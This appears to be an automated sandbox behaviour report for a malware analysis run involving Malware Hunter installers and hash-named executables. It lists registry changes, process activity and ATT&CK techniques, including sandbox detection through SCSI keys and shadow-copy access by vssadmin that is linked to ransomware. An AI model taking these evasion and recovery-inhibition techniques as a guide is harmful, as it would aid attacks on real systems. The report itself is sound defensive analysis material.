Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MHCloudSvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	QuickSearch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	version.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MalwareHunter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Initialize_Standalone_Pro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	statisticsinfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mhtray.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCBooster.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	malwarehunter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mhsetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Time Discovery 1 TTPs 2 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
7836	SystemSettingsAdminFlows.exe
7532	SystemSettingsAdminFlows.exe

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral1/files/0x000200000001e75d-111.dat	nsis_installer_1
behavioral1/files/0x000200000001e75d-111.dat	nsis_installer_2
behavioral1/files/0x0007000000023cad-268.dat	nsis_installer_1
behavioral1/files/0x0007000000023cad-268.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001a73a27760024bf60000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001a73a2770000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001a73a277000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1a73a277000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001a73a27700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3452	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133755868138358362"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CE2B987C-8D49-47D7-B0C2-9890C986EECA}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CE2B987C-8D49-47D7-B0C2-9890C986EECA}\1.0	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3BF9E79E-B4A8-42C0-BD19-2944EB00E621}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Glarysoft\\Malware Hunter\\Cloudscan"	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99963030-D775-49F1-89D2-04246085A4A9}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	MHCloudSvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	MalwareHunter.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\MalwareHunterContextHandler.DLL	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MalwareHunterContextHandler.CContextMen\CurVer\ = "MalwareHunterContextHandler.CContextM.1"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}\ = "CContextMenu Class"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00777352-B7D6-4BEE-AA9B-0F1EBDC1A69D}\ = "CloudService Class"	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0F1893E6-DA20-44DA-8B77-5E881F670B91}\TypeLib\Version = "1.0"	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0F1893E6-DA20-44DA-8B77-5E881F670B91}\ProxyStubClsid32	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CE2B987C-8D49-47D7-B0C2-9890C986EECA}\1.0\0\win64\ = "C:\\Program Files (x86)\\Glarysoft\\Malware Hunter\\x64\\MHContextHandlerx64.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\Glarysoft MalwareHunter	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DA70BB7F-6D27-43D3-9348-04FACAE39186}\TypeLib	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6D99648-2F1B-4E05-8DAD-7E98D058AE95}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Glarysoft MalwareHunter\ = "{EA847F47-97F1-4D78-AB99-C63CA1C327F0}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CloudSer.CloudService.1\CLSID\ = "{00777352-B7D6-4BEE-AA9B-0F1EBDC1A69D}"	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CloudSer.HashManager.1\CLSID	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99963030-D775-49F1-89D2-04246085A4A9}\TypeLib\Version = "1.0"	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}\ = "CContextMenu Class"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6D99648-2F1B-4E05-8DAD-7E98D058AE95}\TypeLib\ = "{CE2B987C-8D49-47D7-B0C2-9890C986EECA}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00777352-B7D6-4BEE-AA9B-0F1EBDC1A69D}\VersionIndependentProgID\ = "CloudSer.CloudService"	MHCloudSvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	MalwareHunter.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\MalwareHunterContextHandler.DLL\AppID = "{9D8C0710-8D32-4A42-84E5-210927BC6CB0}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB8A1CB-C624-4411-96AE-02A89AF7B006}\ = "IHashManager"	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DA70BB7F-6D27-43D3-9348-04FACAE39186}\TypeLib\Version = "1.0"	MHCloudSvc.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	MalwareHunter.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}\VersionIndependentProgID\ = "MalwareHunterContextHandler.CContextMen"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CE2B987C-8D49-47D7-B0C2-9890C986EECA}\1.0\HELPDIR	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MalwareHunterContextHandler.CContextMen\CurVer\ = "MalwareHunterContextHandler.CContextM.1"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB8A1CB-C624-4411-96AE-02A89AF7B006}\TypeLib	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MHCloudSvc.IMHDataManager.1\ = "IMHDataManager Class"	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MHCloudSvc.IMHDataManager	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5BAF0B98-3BFB-41AA-910E-B14CC12CAA06}	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CE2B987C-8D49-47D7-B0C2-9890C986EECA}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Glarysoft\\Malware Hunter\\x64"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6D99648-2F1B-4E05-8DAD-7E98D058AE95}\ = "ICContextMenu"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}\InprocServer32\ = "C:\\Program Files (x86)\\Glarysoft\\Malware Hunter\\MHContextHandler.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6E41E653-D0B6-440D-B4D6-5BE85BB08E06}	MHCloudSvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	MalwareHunter.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6E41E653-D0B6-440D-B4D6-5BE85BB08E06}\ProgID	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MHCloudSvc.IMHDataManager.1	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1267C653-22AD-4A9B-B34F-E7BE90420D17}\ = "ICloudService"	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB8A1CB-C624-4411-96AE-02A89AF7B006}\TypeLib\Version = "1.0"	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MalwareHunterContextHandler.CContextMen\CurVer	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6D99648-2F1B-4E05-8DAD-7E98D058AE95}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MalwareHunterContextHandler.CContextM.1\CLSID\ = "{EA847F47-97F1-4D78-AB99-C63CA1C327F0}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6E41E653-D0B6-440D-B4D6-5BE85BB08E06}\LocalServer32	MHCloudSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MHCloudSvc.IMHDataManager.1\CLSID\ = "{5BAF0B98-3BFB-41AA-910E-B14CC12CAA06}"	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MHCloudSvc.IMHDataManager\CLSID	MHCloudSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	MalwareHunter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	MalwareHunter.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	MalwareHunter.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\Glarysoft MalwareHunter	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MalwareHunterContextHandler.CContextMen\CLSID\ = "{EA847F47-97F1-4D78-AB99-C63CA1C327F0}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter\ = "{EA847F47-97F1-4D78-AB99-C63CA1C327F0}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00777352-B7D6-4BEE-AA9B-0F1EBDC1A69D}\ProgID	MHCloudSvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MHCloudSvc.IMHDataManager.1\CLSID	MHCloudSvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	MalwareHunter.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6D99648-2F1B-4E05-8DAD-7E98D058AE95}	regsvr32.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

pid	Process
3660	reg.exe
7904	reg.exe
4184	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
2720	mhsetup.exe
2720	mhsetup.exe
4580	msedge.exe
4580	msedge.exe
4580	msedge.exe
2368	msedge.exe
2368	msedge.exe
5772	PCBooster.exe
5772	PCBooster.exe
5772	PCBooster.exe
5772	PCBooster.exe
5460	identity_helper.exe
5460	identity_helper.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
5588	chrome.exe
4468	msedge.exe
4468	msedge.exe
5368	msedge.exe
5368	msedge.exe
5732	identity_helper.exe
5732	identity_helper.exe
6196	msedge.exe
6196	msedge.exe
6196	msedge.exe
6196	msedge.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
5500	Setup.exe
5500	Setup.exe
5500	Setup.exe
5604	Setup.exe
5604	Setup.exe
5604	Setup.exe
2788	more.com
2788	more.com
2788	more.com
2788	more.com
7404	more.com
7404	more.com
7404	more.com
7404	more.com
1776	BraveSharedUpdater.exe
1776	BraveSharedUpdater.exe
4420	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
4420	5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
7776	BraveCrashHandler.exe
7776	BraveCrashHandler.exe
5176	powershell.exe
5176	powershell.exe
5176	powershell.exe
3900	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
3900	8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
5288	powershell.exe
5288	powershell.exe
5288	powershell.exe
4724	RegSvcs.exe
4724	RegSvcs.exe
4724	RegSvcs.exe
7468	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
7468	d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
5772	PCBooster.exe
4664	MalwareHunter.exe
5412	iexplore.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
5500	Setup.exe
5604	Setup.exe
2788	more.com
7404	more.com
1776	BraveSharedUpdater.exe
5412	iexplore.exe
6084	b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
2368	msedge.exe
2368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeDebugPrivilege	3016	MalwareHunter.exe
Token: SeShutdownPrivilege	1532	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
1532	chrome.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
5448	mhtray.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe
5368	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2720	mhsetup.exe
3804	version.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
3016	MalwareHunter.exe
2708	MHCloudSvc.exe
3216	Initialize_Standalone_Pro.exe
3216	Initialize_Standalone_Pro.exe
3032	statisticsinfo.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4100	x64ProcessAssistSvc.exe
4100	x64ProcessAssistSvc.exe
4100	x64ProcessAssistSvc.exe
4108	MHCloudSvc.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
5448	mhtray.exe
5448	mhtray.exe
5448	mhtray.exe
5772	PCBooster.exe
5772	PCBooster.exe
5772	PCBooster.exe
5812	QuickSearch.exe
5812	QuickSearch.exe
5812	QuickSearch.exe
5772	PCBooster.exe
5812	QuickSearch.exe
5812	QuickSearch.exe
5812	QuickSearch.exe
